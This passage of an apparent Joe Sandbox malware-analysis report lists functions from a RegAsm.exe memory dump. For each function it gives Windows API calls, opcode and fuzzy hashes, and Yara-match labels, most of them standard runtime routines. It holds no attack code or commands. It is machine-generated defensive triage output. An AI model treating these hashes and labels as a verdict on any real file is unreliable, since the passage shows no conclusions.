                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 428 41fb65-41fb89 CreateFileW
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                                                                                                                                                                                                          • Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                          • Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
                                                                                                                                                                                                                                          • Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                                                                                                                                                                                            • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                          • Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
                                                                                                                                                                                                                                          • Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                                                                                                                                                                                            • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                          • API String ID: 607553120-905460609
                                                                                                                                                                                                                                          • Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
                                                                                                                                                                                                                                          • Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
                                                                                                                                                                                                                                          • Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00407BD9
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                          • Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
                                                                                                                                                                                                                                          • Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 00404C96
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00404D7E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 103145292-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
                                                                                                                                                                                                                                          • Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0040AD17
                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0040AD32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                          • String ID: csm$csm$csm$hqB
                                                                                                                                                                                                                                          • API String ID: 2751267872-961717235
                                                                                                                                                                                                                                          • Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
                                                                                                                                                                                                                                          • Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                          • Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
                                                                                                                                                                                                                                          • Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 667068680-1247241052
                                                                                                                                                                                                                                          • Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
                                                                                                                                                                                                                                          • Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00BECBE8,00BECBE8,?,7FFFFFFF,?,004245F3,00BECBE8,00BECBE8,?,00BECBE8,?,?,?,?,00BECBE8,?), ref: 004243C9
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00424484
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00424513
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0042455E
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00424564
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0042459A
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004245A0
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004245B0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                          • Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
                                                                                                                                                                                                                                          • Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,50A26BB6,?,0041440E,004038E3,?,?,00000000), ref: 004143C2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                          • Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
                                                                                                                                                                                                                                          • Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
                                                                                                                                                                                                                                          • Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                          • Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
                                                                                                                                                                                                                                          • Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,50A26BB6,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
                                                                                                                                                                                                                                          • Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00418F38
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00418FF9
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00419060
                                                                                                                                                                                                                                            • Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00419075
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00419085
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1096550386-0
                                                                                                                                                                                                                                          • Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
                                                                                                                                                                                                                                          • Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00405A30
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A
                                                                                                                                                                                                                                            • Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
                                                                                                                                                                                                                                            • Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9
                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 00405A74
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00405A8B
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 712880209-0
                                                                                                                                                                                                                                          • Opcode ID: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
                                                                                                                                                                                                                                          • Instruction ID: b96a9e16e5313ba5d76a5da041c455aafda494eca7322fa8897946df384a052d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01AD75A00A168BCB05EB65C881AAF7771EF84354F24052EE414BB3D2CB3CAE058F99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00401F9D
                                                                                                                                                                                                                                            • Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
